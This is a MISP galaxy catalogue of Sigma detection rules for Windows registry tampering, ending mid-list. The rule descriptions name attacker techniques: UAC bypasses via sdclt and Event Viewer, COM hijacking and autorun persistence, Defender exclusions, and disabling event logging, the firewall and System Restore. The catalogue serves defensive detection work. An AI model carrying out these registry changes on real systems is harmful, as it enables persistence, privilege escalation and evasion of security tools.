https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml

Wow6432Node Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Wow6432Node Classes Autorun Keys Modification"

Wow6432Node Classes Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9399. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml

Registry Hide Function from User

Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)

The tag is: misp-galaxy:sigma-rules="Registry Hide Function from User"

Registry Hide Function from User has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9400. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting

Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting"

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9401. Table References

Links

https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml

Suspicious Set Value of MSDT in Registry (CVE-2022-30190)

Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.

The tag is: misp-galaxy:sigma-rules="Suspicious Set Value of MSDT in Registry (CVE-2022-30190)"

Suspicious Set Value of MSDT in Registry (CVE-2022-30190) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

Table 9402. Table References

Links

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml

Potential Persistence Via COM Search Order Hijacking

Detects potential COM object hijacking leveraging the COM Search Order

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via COM Search Order Hijacking"

Potential Persistence Via COM Search Order Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9403. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml

UAC Bypass Abusing Winsat Path Parsing - Registry

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Abusing Winsat Path Parsing - Registry"

UAC Bypass Abusing Winsat Path Parsing - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9404. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml

UAC Bypass Using Windows Media Player - Registry

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Windows Media Player - Registry"

UAC Bypass Using Windows Media Player - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9405. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml

Internet Explorer DisableFirstRunCustomize Enabled

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

The tag is: misp-galaxy:sigma-rules="Internet Explorer DisableFirstRunCustomize Enabled"

Table 9406. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf

https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise

https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml

Windows Defender Exclusions Added - Registry

Detects the Setting of Windows Defender Exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusions Added - Registry"

Windows Defender Exclusions Added - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9408. Table References

Links

https://twitter.com/_nullbind/status/1204923340810543109

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml

Change Winevt Event Access Permission Via Registry

Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel

The tag is: misp-galaxy:sigma-rules="Change Winevt Event Access Permission Via Registry"

Change Winevt Event Access Permission Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9409. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/api/winevt/

https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml

WinSock2 Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="WinSock2 Autorun Keys Modification"

WinSock2 Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9410. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml

Potential PSFactoryBuffer COM Hijacking

Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.

The tag is: misp-galaxy:sigma-rules="Potential PSFactoryBuffer COM Hijacking"

Potential PSFactoryBuffer COM Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9411. Table References

Links

https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection

https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html

https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html

https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml

Disabled Windows Defender Eventlog

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

The tag is: misp-galaxy:sigma-rules="Disabled Windows Defender Eventlog"

Disabled Windows Defender Eventlog has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9413. Table References

Links

https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml

Enable Local Manifest Installation With Winget

Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.

The tag is: misp-galaxy:sigma-rules="Enable Local Manifest Installation With Winget"

Table 9414. Table References

Links

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml

Enable LM Hash Storage

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

The tag is: misp-galaxy:sigma-rules="Enable LM Hash Storage"

Enable LM Hash Storage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9415. Table References

Links

https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password

https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml

Disable Windows Firewall by Registry

Detect set EnableFirewall to 0 to disable the Windows firewall

The tag is: misp-galaxy:sigma-rules="Disable Windows Firewall by Registry"

Disable Windows Firewall by Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 9416. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml

Potential Persistence Via Custom Protocol Handler

Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Custom Protocol Handler"

Potential Persistence Via Custom Protocol Handler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9417. Table References

Links

https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

Detects changes to Internet Explorer’s (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

The tag is: misp-galaxy:sigma-rules="IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols"

Table 9418. Table References

Links

https://twitter.com/M_haggis/status/1699056847154725107

https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content

https://twitter.com/JAMESWT_MHT/status/1699042827261391247

https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml

Blue Mockingbird - Registry

Attempts to detect system changes made by Blue Mockingbird

The tag is: misp-galaxy:sigma-rules="Blue Mockingbird - Registry"

Blue Mockingbird - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9419. Table References

Links

https://redcanary.com/blog/blue-mockingbird-cryptominer/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml

Old TLS1.0/TLS1.1 Protocol Version Enabled

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

The tag is: misp-galaxy:sigma-rules="Old TLS1.0/TLS1.1 Protocol Version Enabled"

Table 9420. Table References

Links

https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml

Service Binary in Uncommon Folder

Detect the creation of a service with a service binary located in a uncommon directory

The tag is: misp-galaxy:sigma-rules="Service Binary in Uncommon Folder"

Service Binary in Uncommon Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9421. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml

Changing RDP Port to Non Standard Number

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

The tag is: misp-galaxy:sigma-rules="Changing RDP Port to Non Standard Number"

Changing RDP Port to Non Standard Number has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 9422. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml

Potential Persistence Via Outlook Home Page

Detects potential persistence activity via outlook home pages.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook Home Page"

Potential Persistence Via Outlook Home Page has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9424. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70

https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml

Suspicious Path In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

The tag is: misp-galaxy:sigma-rules="Suspicious Path In Keyboard Layout IME File Registry Value"

Suspicious Path In Keyboard Layout IME File Registry Value has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9425. Table References

Links

https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml

New Root or CA or AuthRoot Certificate to Store

Detects the addition of new root, CA or AuthRoot certificates to the Windows registry

The tag is: misp-galaxy:sigma-rules="New Root or CA or AuthRoot Certificate to Store"

New Root or CA or AuthRoot Certificate to Store has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9426. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml

New BgInfo.EXE Custom DB Path Registry Configuration

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.

The tag is: misp-galaxy:sigma-rules="New BgInfo.EXE Custom DB Path Registry Configuration"

New BgInfo.EXE Custom DB Path Registry Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9427. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml

UAC Bypass via Sdclt

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

The tag is: misp-galaxy:sigma-rules="UAC Bypass via Sdclt"

UAC Bypass via Sdclt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9428. Table References

Links

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml

Outlook Macro Execution Without Warning Setting Enabled

Detects the modification of Outlook security setting to allow unprompted execution of macros.

The tag is: misp-galaxy:sigma-rules="Outlook Macro Execution Without Warning Setting Enabled"

Outlook Macro Execution Without Warning Setting Enabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9429. Table References

Links

https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml

Trust Access Disable For VBApplications

Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.

The tag is: misp-galaxy:sigma-rules="Trust Access Disable For VBApplications"

Trust Access Disable For VBApplications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9430. Table References

Links

https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml

Persistence Via Hhctrl.ocx

Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary

The tag is: misp-galaxy:sigma-rules="Persistence Via Hhctrl.ocx"

Table 9431. Table References

Links

https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/

https://persistence-info.github.io/Data/hhctrl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml

Registry Disable System Restore

Detects the modification of the registry to disable a system restore on the computer

The tag is: misp-galaxy:sigma-rules="Registry Disable System Restore"

Registry Disable System Restore has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9432. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml

Potential Persistence Via Shim Database In Uncommon Location

Detects the installation of a new shim database where the file is located in a non-default location

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Shim Database In Uncommon Location"

Potential Persistence Via Shim Database In Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9433. Table References

Links

https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/

https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml

Potential Registry Persistence Attempt Via Windows Telemetry

Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

The tag is: misp-galaxy:sigma-rules="Potential Registry Persistence Attempt Via Windows Telemetry"

Potential Registry Persistence Attempt Via Windows Telemetry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9434. Table References

Links

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml

PowerShell Logging Disabled Via Registry Key Tampering

Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging

The tag is: misp-galaxy:sigma-rules="PowerShell Logging Disabled Via Registry Key Tampering"

PowerShell Logging Disabled Via Registry Key Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 9435. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml

New BgInfo.EXE Custom WMI Query Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"

The tag is: misp-galaxy:sigma-rules="New BgInfo.EXE Custom WMI Query Registry Configuration"

New BgInfo.EXE Custom WMI Query Registry Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9436. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml

Winlogon AllowMultipleTSSessions Enable

Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users

The tag is: misp-galaxy:sigma-rules="Winlogon AllowMultipleTSSessions Enable"

Winlogon AllowMultipleTSSessions Enable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9437. Table References

Links

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml

Add DisallowRun Execution to Registry

Detect set DisallowRun to 1 to prevent user running specific computer program

The tag is: misp-galaxy:sigma-rules="Add DisallowRun Execution to Registry"

Add DisallowRun Execution to Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9438. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml

IE Change Domain Zone

Hides the file extension through modification of the registry

The tag is: misp-galaxy:sigma-rules="IE Change Domain Zone"

IE Change Domain Zone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9439. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone

https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml

Potential Persistence Via DLLPathOverride

Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via DLLPathOverride"

Table 9440. Table References

Links

https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/

https://persistence-info.github.io/Data/naturallanguage6.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml

Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json

The tag is: misp-galaxy:sigma-rules="Lolbas OneDriveStandaloneUpdater.exe Proxy Download"

Lolbas OneDriveStandaloneUpdater.exe Proxy Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9441. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml

UAC Bypass via Event Viewer

Detects UAC bypass method using Windows event viewer

The tag is: misp-galaxy:sigma-rules="UAC Bypass via Event Viewer"

UAC Bypass via Event Viewer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9442. Table References

Links

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Wow6432Node Windows NT CurrentVersion Autorun Keys Modification"

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9443. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml

Potential Persistence Via Mpnotify

Detects when an attacker register a new SIP provider for persistence and defense evasion

